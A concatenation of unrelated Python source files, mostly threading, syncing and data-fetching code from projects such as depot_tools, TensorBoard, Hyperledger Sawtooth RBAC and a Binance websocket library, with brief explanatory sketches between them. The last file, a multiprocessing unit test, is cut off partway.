setattr(presubmit_canned_checks, name, method) def main(argv=None): parser = optparse.OptionParser(usage="%prog [options] <files...>", version="%prog " + str(__version__)) parser.add_option("-c", "--commit", action="store_true", default=False, help="Use commit instead of upload checks") parser.add_option("-u", "--upload", action="store_false", dest='commit', help="Use upload instead of commit checks") parser.add_option("-r", "--recursive", action="store_true", help="Act recursively") parser.add_option("-v", "--verbose", action="count", default=0, help="Use 2 times for more debug info") parser.add_option("--name", default='no name') parser.add_option("--author") parser.add_option("--description", default='') parser.add_option("--issue", type='int', default=0) parser.add_option("--patchset", type='int', default=0) parser.add_option("--root", default=os.getcwd(), help="Search for PRESUBMIT.py up to this directory. " "If inherit-review-settings-ok is present in this " "directory, parent directories up to the root file " "system directories will also be searched.") parser.add_option("--upstream", help="Git only: the base ref or upstream branch against " "which the diff should be computed.") parser.add_option("--default_presubmit") parser.add_option("--may_prompt", action='store_true', default=False) parser.add_option("--skip_canned", action='append', default=[], help="A list of checks to skip which appear in " "presubmit_canned_checks. 
Can be provided multiple times " "to skip multiple canned checks.") parser.add_option("--dry_run", action='store_true', help=optparse.SUPPRESS_HELP) parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP) parser.add_option("--gerrit_fetch", action='store_true', help=optparse.SUPPRESS_HELP) parser.add_option('--parallel', action='store_true', help='Run all tests specified by input_api.RunTests in all ' 'PRESUBMIT files in parallel.') options, args = parser.parse_args(argv) if options.verbose >= 2: logging.basicConfig(level=logging.DEBUG) elif options.verbose: logging.basicConfig(level=logging.INFO) else: logging.basicConfig(level=logging.ERROR) change_class, files = load_files(options, args) if not change_class: parser.error('For unversioned directory, <files> is not optional.') logging.info('Found %d file(s).', len(files)) gerrit_obj = None if options.gerrit_url and options.gerrit_fetch: assert options.issue and options.patchset gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc) options.author = gerrit_obj.GetChangeOwner(options.issue) options.description = gerrit_obj.GetChangeDescription(options.issue, options.patchset) logging.info('Got author: "%s"', options.author) logging.info('Got description: """\n%s\n"""', options.description) try: with canned_check_filter(options.skip_canned): results = DoPresubmitChecks( change_class(options.name, options.description, options.root, files, options.issue, options.patchset, options.author, upstream=options.upstream), options.commit, options.verbose, sys.stdout, sys.stdin, options.default_presubmit, options.may_prompt, gerrit_obj, options.dry_run, options.parallel) return not results.should_continue() except PresubmitFailure, e: print >> sys.stderr, e print >> sys.stderr, 'Maybe your depot_tools is out of date?' return 2 if __name__ == '__main__': fix_encoding.fix_encoding() try: sys.exit(main()) except KeyboardInterrupt: sys.stderr.write('interrupted\n') sys.exit(2)
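The canned_check_filter context manager above temporarily swaps the named canned checks for no-op functions and restores the originals on exit. Below is a minimal, self-contained sketch of that patch-and-restore pattern; the class and names are illustrative only and are not depot_tools code.

import contextlib

class _FakeCannedChecks(object):
    @staticmethod
    def CheckLongLines(*_a, **_kw):
        return ['long line found']

@contextlib.contextmanager
def skip_checks(holder, method_names):
    saved = {}
    try:
        for name in method_names:
            if not hasattr(holder, name):
                continue
            # Remember the original callable, then replace it with a no-op
            # that reports no findings.
            saved[name] = getattr(holder, name)
            setattr(holder, name, lambda *_a, **_kw: [])
        yield
    finally:
        # Always restore the originals, even if the body raised.
        for name, method in saved.items():
            setattr(holder, name, method)

with skip_checks(_FakeCannedChecks, ['CheckLongLines']):
    assert _FakeCannedChecks.CheckLongLines() == []
assert _FakeCannedChecks.CheckLongLines() == ['long line found']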
server.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Module for building TensorBoard servers. This is its own module so it can be used in both actual code and test code. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import functools import os import threading import time import re import six from six.moves import BaseHTTPServer from six.moves import socketserver from tensorflow.python.platform import tf_logging as logging from tensorflow.python.summary import event_accumulator from tensorflow.python.summary.impl import io_wrapper from tensorflow.tensorboard.backend import handler # How many elements to store per tag, by tag type TENSORBOARD_SIZE_GUIDANCE = { event_accumulator.COMPRESSED_HISTOGRAMS: 500, event_accumulator.IMAGES: 4, event_accumulator.AUDIO: 4, event_accumulator.SCALARS: 1000, event_accumulator.HISTOGRAMS: 50, } def ParseEventFilesSpec(logdir): """Parses `logdir` into a map from paths to run group names. The events files flag format is a comma-separated list of path specifications. A path specification either looks like 'group_name:/path/to/directory' or '/path/to/directory'; in the latter case, the group is unnamed. Group names cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec with no name and path '/foo:bar/baz'. Globs are not supported. Args: logdir: A comma-separated list of run specifications. Returns: A dict mapping directory paths to names like {'/path/to/directory': 'name'}. Groups without an explicit name are named after their path. If logdir is None, returns an empty dict, which is helpful for testing things that don't require any valid runs. """ files = {} if logdir is None: return files # Make sure keeping consistent with ParseURI in core/lib/io/path.cc uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]://.*") for specification in logdir.split(','): # Check if the spec contains group. A spec start with xyz:// is regarded as # URI path spec instead of group spec. If the spec looks like /foo:bar/baz, # then we assume it's a path with a colon. if uri_pattern.match(specification) is None and \ ':' in specification and specification[0] != '/': # We split at most once so run_name:/path:with/a/colon will work. run_name, _, path = specification.partition(':') else: run_name = None path = specification if uri_pattern.match(path) is None: path = os.path.realpath(path) files[path] = run_name return files def ReloadMultiplexer(multiplexer, path_to_run): """Loads all runs into the multiplexer. Args: multiplexer: The `EventMultiplexer` to add runs to and reload. path_to_run: A dict mapping from paths to run names, where `None` as the run name is interpreted as a run name equal to the path. 
""" start = time.time() logging.info('TensorBoard reload process beginning') for (path, name) in six.iteritems(path_to_run): multiplexer.AddRunsFromDirectory(path, name) logging.info('TensorBoard reload process: Reload the whole Multiplexer') multiplexer.Reload() duration = time.time() - start logging.info('TensorBoard done reloading. Load took %0.3f secs', duration) def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval): """Starts a thread to automatically reload the given multiplexer. The thread will reload the multiplexer by calling `ReloadMultiplexer` every `load_interval` seconds, starting immediately. Args: multiplexer: The `EventMultiplexer` to add runs to and reload. path_to_run: A dict mapping from paths to run names, where `None` as the run name is interpreted as a run name equal to the path. load_interval: How many seconds to wait after one load before starting the next load. Returns: A started `threading.Thread` that reloads the multiplexer. """ # We don't call multiplexer.Reload() here because that would make # AddRunsFromDirectory block until the runs have all loaded. def _ReloadForever(): while True: ReloadMultiplexer(multiplexer, path_to_run) time.sleep(load_interval) thread = threading.Thread(target=_ReloadForever) thread.daemon = True thread.start() return thread class ThreadedHTTPServer(socketserver.ThreadingMixIn, BaseHTTPServer.HTTPServer): """A threaded HTTP server.""" daemon_threads = True def BuildServer(multiplexer, host, port, logdir): """Sets up an HTTP server for running TensorBoard. Args: multiplexer: An `EventMultiplexer` that the server will query for information about events. host: The host name. port: The port number to bind to, or 0 to pick one automatically. logdir: The logdir argument string that tensorboard started up with. Returns: A `BaseHTTPServer.HTTPServer`. """ factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir) return ThreadedHTTPServer((host, port), factory)
semaphore.py
""" semaphore dapat digunakan untuk menentukan berapa banyak proses yang dapat mengakses shared resource semaphore dengan nilai 1, cuma mengizinkan satu proses untuk mengakses shared resource (sama dengan lock) """ import threading, time, random counter = 0 sem = threading.Semaphore(1) def worker(name): global counter for _ in range(10): if sem.acquire(timeout=0.1): counter = counter + 1 print(f"{name}: {counter}") time.sleep(random.random()) sem.release() else: print(f"{name} skipping") threads = [] for i in ['budi', 'agus', 'rudi']: thread = threading.Thread(target=worker, args=(i,)) thread.start() threads.append(thread) for t in threads: t.join()
initial_inbound_sync.py
#! /usr/bin/env python3 # Copyright 2018 Contributors to Hyperledger Sawtooth # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ----------------------------------------------------------------------------- # http://docs.python-requests.org/en/master/ import os import sys import json import logging from datetime import datetime, timezone import threading import rethinkdb as r import ldap3 from ldap3 import ALL, Connection, Server from rbac.providers.common.inbound_filters import ( inbound_user_filter, inbound_group_filter, ) from rbac.providers.common.common import save_sync_time, check_last_sync from rbac.providers.ldap.delta_inbound_sync import inbound_delta_sync from rbac.providers.common.rethink_db import connect_to_db LOGGER = logging.getLogger(__name__) LOGGER.level = logging.DEBUG LOGGER.addHandler(logging.StreamHandler(sys.stdout)) DB_HOST = os.getenv("DB_HOST", "rethink") DB_PORT = int(float(os.getenv("DB_PORT", "28015"))) DB_NAME = os.getenv("DB_NAME", "rbac") LDAP_DC = os.getenv("LDAP_DC") LDAP_SERVER = os.getenv("LDAP_SERVER") LDAP_USER = os.getenv("LDAP_USER") LDAP_PASS = os.getenv("LDAP_PASS") LDAP_FILTER_USER = "(objectClass=person)" LDAP_FILTER_GROUP = "(objectClass=group)" def fetch_ldap_data(data_type): """ Call to get entries for all (Users | Groups) in Active Directory, saves the time of the sync, inserts data into RethinkDB, and initiates a new thread for a delta sync for data_type. """ connect_to_db() if data_type == "user": search_filter = LDAP_FILTER_USER elif data_type == "group": search_filter = LDAP_FILTER_GROUP server = Server(LDAP_SERVER, get_info=ALL) conn = Connection(server, user=LDAP_USER, password=LDAP_PASS) if not conn.bind(): LOGGER.error( "Error connecting to LDAP server %s : %s", LDAP_SERVER, conn.result ) conn.search( search_base=LDAP_DC, search_filter=search_filter, attributes=ldap3.ALL_ATTRIBUTES, ) insert_to_db(data_dict=conn.entries, data_type=data_type) sync_source = "ldap-" + data_type provider_id = LDAP_DC save_sync_time(provider_id, sync_source, "initial") def insert_to_db(data_dict, data_type): """Insert (Users | Groups) individually to RethinkDB from dict of data and begins delta sync timer.""" for entry in data_dict: entry_data = json.loads(entry.entry_to_json())["attributes"] if data_type == "user": standardized_entry = inbound_user_filter(entry_data, "ldap") elif data_type == "group": standardized_entry = inbound_group_filter(entry_data, "ldap") inbound_entry = { "data": standardized_entry, "data_type": data_type, "timestamp": datetime.now().replace(tzinfo=timezone.utc).isoformat(), "provider_id": LDAP_DC, } r.table("inbound_queue").insert(inbound_entry).run() LOGGER.info( "Inserted %s %s records into inbound_queue.", str(len(data_dict)), data_type ) def initiate_delta_sync(): """Starts a new delta sync thread for LDAP data_type.""" threading.Thread(target=inbound_delta_sync).start() def initialize_ldap_sync(): """ Checks if LDAP initial syncs has been ran. If not, run initial sync for both ldap users and groups. 
If initial syncs have been completed, restart the inbound delta syncs. """ if LDAP_DC: connect_to_db() user_sync_completed = False group_sync_completed = False db_user_payload = check_last_sync("ldap-user", "initial") if not db_user_payload: LOGGER.info( "No initial AD user sync was found. Starting initial AD user sync now." ) LOGGER.info("Getting AD Users...") fetch_ldap_data(data_type="user") LOGGER.info("Initial AD user upload completed.") user_sync_completed = True db_group_payload = check_last_sync("ldap-group", "initial") if not db_group_payload: LOGGER.info( "No initial AD group sync was found. Starting initial AD group sync now." ) LOGGER.info("Getting Groups with Members...") fetch_ldap_data(data_type="group") LOGGER.info("Initial AD group upload completed.") group_sync_completed = True if user_sync_completed and group_sync_completed: initiate_delta_sync() else: LOGGER.info( "Initial syncs did not complete successfully, LDAP delta sync will not start." ) if db_user_payload and db_group_payload: LOGGER.info("The LDAP initial sync has already been run.") initiate_delta_sync() else: LOGGER.info("LDAP Domain Controller is not provided, skipping LDAP sync.")
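initiate_delta_sync above kicks off the long-running delta sync on a background thread so the initial sync path can return immediately. A minimal sketch of that fire-and-forget pattern with a dummy sync loop (names are illustrative, not from this repo):

import threading
import time

def delta_sync_loop(poll_seconds=0.5, rounds=3):
    for i in range(rounds):
        print(f"delta sync pass {i}")
        time.sleep(poll_seconds)

sync_thread = threading.Thread(target=delta_sync_loop, name="delta-sync")
sync_thread.start()
print("initial sync finished; delta sync continues in the background")
sync_thread.join()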
dev_test_cex_subscribe.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # File: dev_test_cex_subscribe.py # # Part of ‘UNICORN Binance WebSocket API’ # Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api # Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api # PyPI: https://pypi.org/project/unicorn-binance-websocket-api/ # # Author: Oliver Zehentleitner # https://about.me/oliver-zehentleitner # # Copyright (c) 2019-2020, Oliver Zehentleitner # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager import logging import time import threading import os # https://docs.python.org/3/library/logging.html#logging-levels logging.basicConfig(level=logging.DEBUG, filename=os.path.basename(__file__) + '.log', format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}", style="{") def print_stream_data_from_stream_buffer(binance_websocket_api_manager): while True: if binance_websocket_api_manager.is_manager_stopping(): exit(0) oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer() if oldest_stream_data_from_stream_buffer is False: time.sleep(0.01) else: #print(oldest_stream_data_from_stream_buffer) pass # create instance of BinanceWebSocketApiManager for Binance Chain DEX binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com") # start a worker process to move the received stream_data from the stream_buffer to a print function worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,)) worker_thread.start() #markets = ['xrpusdt', 'rvnbtc'] markets = ['xrpusdt'] stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets) time.sleep(2) binance_websocket_api_manager.get_stream_subscriptions(stream_id) #binance_websocket_api_manager.subscribe_to_stream(stream_id, # channels=['kline_1m', 'kline_5m', 'marketDepth', # 'ticker', 'miniTicker', 'marketDiff']) #binance_websocket_api_manager.subscribe_to_stream(stream_id, channels="arr", markets="!miniTicker") #time.sleep(5) #binance_websocket_api_manager.get_stream_subscriptions(stream_id) markets = ['xrpbearbusd', 'zeceth', 'cndbtc', 'dashbtc', 'atompax', 'perlbtc', 'ardreth', 'zecbnb', 'bchabctusd', 'usdsbusdt', 'winbnb', 'xzcxrp', 'bchusdc', 'wavesbnb', 'kavausdt', 'btsusdt', 'chzbnb', 'tusdbnb', 'xtzbusd', 'bcptusdc', 'dogebnb', 'eosbearusdt', 'ambbnb', 
'wrxbnb', 'poabtc', 'wanbtc', 'ardrbtc', 'icnbtc', 'tusdusdt', 'atombusd', 'nxseth', 'bnbusdt', 'trxxrp', 'erdpax', 'erdbtc', 'icxbusd', 'nulsbtc', 'hotusdt', 'wavespax', 'zilbnb', 'arnbtc', 'nulsusdt', 'wintrx', 'npxsbtc', 'busdtry', 'qtumbnb', 'eosbtc', 'xlmpax', 'tomobnb', 'eosbnb', 'engbtc', 'linketh', 'xrpbtc', 'fetbtc', 'stratusdt', 'navbnb', 'bcneth', 'yoyobtc', 'nanobnb', 'saltbtc', 'tfuelusdc', 'skybnb', 'fuelbtc', 'bnbusdc', 'inseth', 'btcpax', 'batbtc', 'rlceth', 'arketh', 'ltcpax', 'ltcbusd', 'duskbtc', 'mftusdt', 'bntusdt', 'mdabtc', 'enjbtc', 'poabnb', 'nanobusd', 'paxtusd', 'hotbtc', 'bcdbtc', 'beambnb', 'trxeth', 'omgbnb', 'cdtbtc', 'eosusdc', 'dashbusd', 'cocosbtc', 'dasheth', 'xrptusd', 'atomtusd', 'rcneth', 'rpxeth', 'xlmusdc', 'aionbusd', 'nxsbtc', 'chateth', 'repbtc', 'tctusdt', 'linkusdt', 'nasbtc', 'usdsusdc', 'xvgbtc', 'elfeth', 'ctxcbtc', 'cmteth', 'gnteth', 'usdspax', 'zilbtc', 'batpax', 'stratbtc', 'xzcbtc', 'iotausdt', 'etcbnb', 'ankrusdt', 'xlmeth', 'loombtc', 'erdusdc', 'rdnbnb', 'icneth', 'vetbtc', 'cvcusdt', 'ftmpax', 'ethbullusdt', 'edoeth', 'steemeth', 'gobnb', 'hsrbtc', 'ambbtc', 'bchabcbtc', 'dntbtc', 'btctusd', 'denteth', 'snglsbtc', 'eosbullusdt', 'xlmtusd', 'tnteth', 'sysbnb', 'renusdt', 'zrxusdt', 'xlmbtc', 'stormbtc', 'ncashbnb', 'omgusdt', 'troyusdt', 'venbtc', 'modbtc', 'dogepax', 'ontusdc', 'eurbusd', 'tctbnb', 'gxsbtc', 'celrbnb', 'adausdt', 'beambtc', 'elfbtc', 'celrbtc', 'rvnusdt', 'poaeth', 'wavesusdc', 'trxbnb', 'trxusdc', 'ethbearusdt', 'ethpax', 'bateth', 'kavabtc', 'paxbtc', 'trigbnb', 'btcusdc', 'oneusdc', 'xrptry', 'stxusdt', 'strateth', 'lendeth', 'neousdc', 'neobnb', 'cosbtc', 'powreth', 'rlcusdt', 'hbarbnb', 'wabieth', 'bqxeth', 'aionbtc', 'aeeth', 'mthbtc', 'wrxbtc', 'pptbtc', 'nknbtc', 'zecusdt', 'stormeth', 'qtumusdt'] time.sleep(2) binance_websocket_api_manager.subscribe_to_stream(stream_id, channels=['kline_1m', 'marketDepth', 'ticker', 'miniTicker', 'marketDiff'], markets=markets) time.sleep(10) binance_websocket_api_manager.get_stream_subscriptions(stream_id) results = binance_websocket_api_manager.get_results_from_endpoints() print(str(results)) time.sleep(5) for result in results: print(str(result)) while True: #binance_websocket_api_manager.print_summary() binance_websocket_api_manager.print_stream_info(stream_id) time.sleep(1)
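The worker thread above drains the manager's stream_buffer and sleeps briefly when nothing is buffered, so the loop does not spin at full CPU. A minimal stand-alone sketch of that poll-with-backoff consumer (it does not use the unicorn-binance-websocket-api; the buffer is just a deque here):

import collections
import threading
import time

stream_buffer = collections.deque()

def consume(stop_event):
    while not stop_event.is_set():
        try:
            item = stream_buffer.popleft()
        except IndexError:
            time.sleep(0.01)  # nothing buffered yet, back off briefly
            continue
        print("consumed:", item)

stop = threading.Event()
worker = threading.Thread(target=consume, args=(stop,))
worker.start()
for i in range(5):
    stream_buffer.append({"seq": i})
time.sleep(0.1)
stop.set()
worker.join()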
app.py
#####################################################################
#
# Data Simulator for Apache Kafka
#
# Deployed as a container (scaled with Kubernetes, GKE)
#
# Test with python 3.7
# https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
#
# Prereqs:
# pip install kafka-python
#
#####################################################################

from kafka import KafkaProducer
import json
import re
import datetime, time
import random
import argparse
import threading
import params


def simulate_payload():
    datetimestamp = datetime.datetime.now()
    payload = {
        'id': datetimestamp.strftime('%Y%m%d%H%M%S%f'),
        'date': datetimestamp.strftime('%Y-%m-%d'),
        'timestamp': datetimestamp.strftime('%H:%M:%S.%f'),
        'flag': random.randint(0,1),
        'value': random.triangular(35,70,175)
    }
    return payload


def initialize_kafka_producer(params):
    try:
        producer = KafkaProducer(bootstrap_servers=params['bootstrap_servers'],
                                 value_serializer=lambda v: json.dumps(v).encode('utf-8'))  # JSON-based Producer
    except Exception as e:
        print('[ EXCEPTION ] Could not connect to Kafka bootstrap server - {}'.format(e))
        # Re-raise: without a connected producer there is nothing useful to return,
        # and falling through would reference an unbound name.
        raise
    return producer


def publish_kafka_event(params, producer, counter):
    while True:
        payload = simulate_payload()
        payload['counter'] = counter
        if params['send_to_kafka']==1:
            try:
                producer.send(params['kafka_topic'], value=payload)  # JSON-based kafka commit
            except Exception as e:
                print('[ EXCEPTION ] Failure sending JSON payload to Kafka producer - {}'.format(e))
        else:
            print('{}\n'.format(payload))
        time.sleep(params['time_delay'])


if __name__ == "__main__":
    params = {
        'bootstrap_servers' : 'kafka-server1-vm:9092',
        'send_to_kafka' : 1,
        'kafka_topic' : 'topicz1',
        'time_delay' : 5,
        'number_of_threads' : 100
    }
    producer = initialize_kafka_producer(params)
    threads = []
    for i in range(params['number_of_threads']):
        threads.append(threading.Thread(target=publish_kafka_event, args=(params, producer, i,)))
    for thread in threads:
        thread.start()

    #ZEND
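The simulator above fans payload generation out across many publisher threads that all share one producer. A minimal sketch of that fan-out, with the Kafka client stubbed out so it runs without a broker (the publish callable is just print here; all names are illustrative):

import datetime
import random
import threading
import time

def simulate_payload(counter):
    now = datetime.datetime.now()
    return {
        "id": now.strftime("%Y%m%d%H%M%S%f"),
        "value": random.triangular(35, 70, 175),
        "counter": counter,
    }

def publisher(publish, counter, rounds=3, delay=0.05):
    # Each thread builds its own payloads and hands them to the shared publish callable.
    for _ in range(rounds):
        publish(simulate_payload(counter))
        time.sleep(delay)

threads = [threading.Thread(target=publisher, args=(print, i)) for i in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()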
alpacaHistorical.py
import json import threading from threading import Thread import time import logging from datetime import datetime, timedelta from enum import Enum import requests from alpaca_trade_api.rest import REST, TimeFrame from .yahooFin import YahooFin from util import AlpacaAccess, RedisTimeFrame custom_header = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'} response = requests.get('https://www.dev2qa.com', headers=custom_header) class TimePeriod(Enum): REALTIME = "0" Min1 = "1Min" Min5 = "5Min" Min10 = "10Min" Min15 = "15Min" Min30 = "30Min" Hour = "Hour" Hour4 = "4Hour" Day = "Day" Week = "Week" class AlpacaHistorical: ALPACA_URL = 'https://data.alpaca.markets/v2/stocks/%s/bars?start=%s&end=%s&timeframe=%s' CRYPTO_URL = 'https://data.alpaca.markets/v1beta1/crypto/%sUSD/bars?start=%s&end=%s&timeframe=%s&exchanges=CBSE' CsvHeader = "Date, Open, High, Low, Close, Adj Close, Volume" conn: REST = None def __init__(self): self.custom_header = AlpacaAccess.CustomHeader() def timeframe_start(self, timeframe): switcher = { RedisTimeFrame.REALTIME: datetime.now() - timedelta(minutes=30), RedisTimeFrame.MIN1: datetime.now() - timedelta(minutes=30), RedisTimeFrame.MIN2: datetime.now() - timedelta(minutes=60), RedisTimeFrame.MIN5: datetime.now() - timedelta(minutes=150), RedisTimeFrame.MIN30: datetime.now() - timedelta(days=2), RedisTimeFrame.HOUR: datetime.now() - timedelta(days=28), RedisTimeFrame.DAILY: datetime.now() - timedelta(days=360), RedisTimeFrame.WEEKLY: datetime.now() - timedelta(days=1080), } dt = switcher.get(timeframe, datetime.now()) date_string = dt.isoformat('T') + 'Z' return date_string # return "2021-02-08" def timeframe_end(self, timeframe): dt = datetime.now() date_string = dt.isoformat('T') + 'Z' return date_string # return "2021-02-10" def columnName(self, datatype): switcher = { "open": "o", "close": "c", "high": "h", "low": "l", "volume": "v" } return switcher.get(datatype, 'c') def reverseArray(self, arrayData): return arrayData[::-1] def column(self, matrix, i): return [row[i] for row in matrix] def adjustPrices(self, data, datatype): result = json.loads(data.text) bars = result['bars'] if bars is None: return [] data = self.reverseArray(bars) if datatype is None: return data else: dtype = self.columnName(datatype) prices = self.column(data, dtype) return prices def HistoricalPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): start = self.timeframe_start( timeframe) if starttime is None else starttime end = self.timeframe_end(timeframe) if endtime is None else endtime tf = '1Min' if RedisTimeFrame.REALTIME == timeframe else timeframe url = AlpacaHistorical.ALPACA_URL % ( symbol, start, end, tf) data = requests.get(url, headers=self.custom_header) bars = self.adjustPrices(data, datatype) return bars def CryptoPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): start = self.timeframe_start( timeframe) if starttime is None else starttime end = self.timeframe_end(timeframe) if endtime is None else endtime tf = '1Min' if RedisTimeFrame.REALTIME == timeframe else timeframe url = AlpacaHistorical.CRYPTO_URL % ( symbol, start, end, tf) data = requests.get(url, headers=self.custom_header) bars = self.adjustPrices(data, datatype) return bars def CommodityPrices(self, symbol, timeframe, datatype=None, starttime=None, endtime=None): # logging.info(f'AlpacaHistorical.CommodityPrices {symbol} {timeframe} {datatype}') bars = 
YahooFin.HistoricalPrices(symbol) return bars def WriteToFile(self, symbol, data): text = "{}, {}, {}, {}, {}, {}, {}" historicalText = [text.format(x['t'], x['o'], x['h'], x['l'], x['c'], x['c'], x['v']) for x in data] filename = './data/stocks/' + symbol + '.csv' with open(filename, 'w') as f: f.write(self.CsvHeader + '\n') for line in historicalText: f.write(line + '\n') class AlpacaHistoricalData(AlpacaHistorical): def __init__(self, startdate=None, enddate=None): super().__init__() self.startdate = startdate self.enddate = enddate def getDataLine(self, app, line, fw): try: timeframe = RedisTimeFrame.DAILY symbol = line.split(',')[0] if self.startdate is not None and self.enddate is not None: data = self.HistoricalPrices(symbol, timeframe, starttime=self.startdate, endtime=self.enddate) else: data = app.HistoricalPrices(symbol, timeframe) app.WriteToFile(symbol, data) fw.write(line) except Exception as e: logging.error(f'AlpacaHistoricalData.getDataLine {symbol} - {e}') print(e) def Run(self, filename=None, isDebug=False): # logging.info('AlpacaHistoricalData.Run') filename = './data/symbols.csv' if filename == None else filename with open(filename, 'r') as f: lines = f.readlines() # print(lines) logging.error(f'AlpacaHistoricalData.Run - lines {len(lines)}') with open(filename, "w") as fw: fw.write(self.CsvHeader + '\n') timeframe = RedisTimeFrame.DAILY app = AlpacaHistorical() lineCount = 0 for line in lines: if (isDebug): lineCount += 1 print(lineCount) Thread(target=self.getDataLine, args=(app, line, fw)).start() while (threading.activeCount() > 10): time.sleep(2) if threading.activeCount() > 0: time.sleep(2) @staticmethod def All(startdate=None, enddate=None): if (startdate is None and enddate is None): app = AlpacaHistoricalData() app.Run(isDebug=True) elif (startdate and enddate is None): # convert string to datetime enddate = datetime.strptime(startdate, '%Y-%m-%d') startdate = enddate - timedelta(days=400) app = AlpacaHistoricalData(startdate, enddate) app.Run(isDebug=True) elif (startdate and enddate): enddate = datetime.strptime(enddate, '%Y-%m-%d') startdate = datetime.strptime(startdate, '%Y-%m-%d') app = AlpacaHistoricalData(startdate, enddate) app.Run(isDebug=True) if __name__ == "__main__": AlpacaHistoricalData.All() # timeframe = RedisTimeFrame.DAILY # symbol = "AAPL" # app = AlpacaHistorical() # data = app.HistoricalPrices(symbol, timeframe) # app.WriteToFile(symbol, data) # # print('done')
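The Run() method above caps concurrency by polling threading.activeCount() and sleeping while more than ten threads are alive. A common alternative, sketched here with a dummy download task, is a semaphore that at most a fixed number of worker threads can hold at once; the names below are illustrative and not part of this module.

import threading
import time

max_workers = threading.Semaphore(10)

def fetch_one(symbol):
    with max_workers:  # at most 10 fetches run concurrently
        time.sleep(0.05)  # stand-in for the HTTP request and file write
        print("fetched", symbol)

threads = [threading.Thread(target=fetch_one, args=(f"SYM{i}",)) for i in range(30)]
for t in threads:
    t.start()
for t in threads:
    t.join()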
test_multiprocessing.py
#!/usr/bin/env python # # Unit tests for the multiprocessing package # import unittest import Queue import time import sys import os import gc import signal import array import socket import random import logging import errno import test.script_helper from test import test_support from StringIO import StringIO _multiprocessing = test_support.import_module('_multiprocessing') # import threading after _multiprocessing to raise a more relevant error # message: "No module named _multiprocessing". _multiprocessing is not compiled # without thread support. import threading # Work around broken sem_open implementations test_support.import_module('multiprocessing.synchronize') import multiprocessing.dummy import multiprocessing.connection import multiprocessing.managers import multiprocessing.heap import multiprocessing.pool from multiprocessing import util try: from multiprocessing import reduction HAS_REDUCTION = True except ImportError: HAS_REDUCTION = False try: from multiprocessing.sharedctypes import Value, copy HAS_SHAREDCTYPES = True except ImportError: HAS_SHAREDCTYPES = False try: import msvcrt except ImportError: msvcrt = None # # # latin = str # # Constants # LOG_LEVEL = util.SUBWARNING #LOG_LEVEL = logging.DEBUG DELTA = 0.1 CHECK_TIMINGS = False # making true makes tests take a lot longer # and can sometimes cause some non-serious # failures because some calls block a bit # longer than expected if CHECK_TIMINGS: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4 else: TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1 HAVE_GETVALUE = not getattr(_multiprocessing, 'HAVE_BROKEN_SEM_GETVALUE', False) WIN32 = (sys.platform == "win32") try: MAXFD = os.sysconf("SC_OPEN_MAX") except: MAXFD = 256 # # Some tests require ctypes # try: from ctypes import Structure, c_int, c_double except ImportError: Structure = object c_int = c_double = None def check_enough_semaphores(): """Check that the system supports enough semaphores to run the test.""" # minimum number of semaphores available according to POSIX nsems_min = 256 try: nsems = os.sysconf("SC_SEM_NSEMS_MAX") except (AttributeError, ValueError): # sysconf not available or setting not available return if nsems == -1 or nsems >= nsems_min: return raise unittest.SkipTest("The OS doesn't support enough semaphores " "to run the test (required: %d)." % nsems_min) # # Creates a wrapper for a function which records the time it takes to finish # class TimingWrapper(object): def __init__(self, func): self.func = func self.elapsed = None def __call__(self, *args, **kwds): t = time.time() try: return 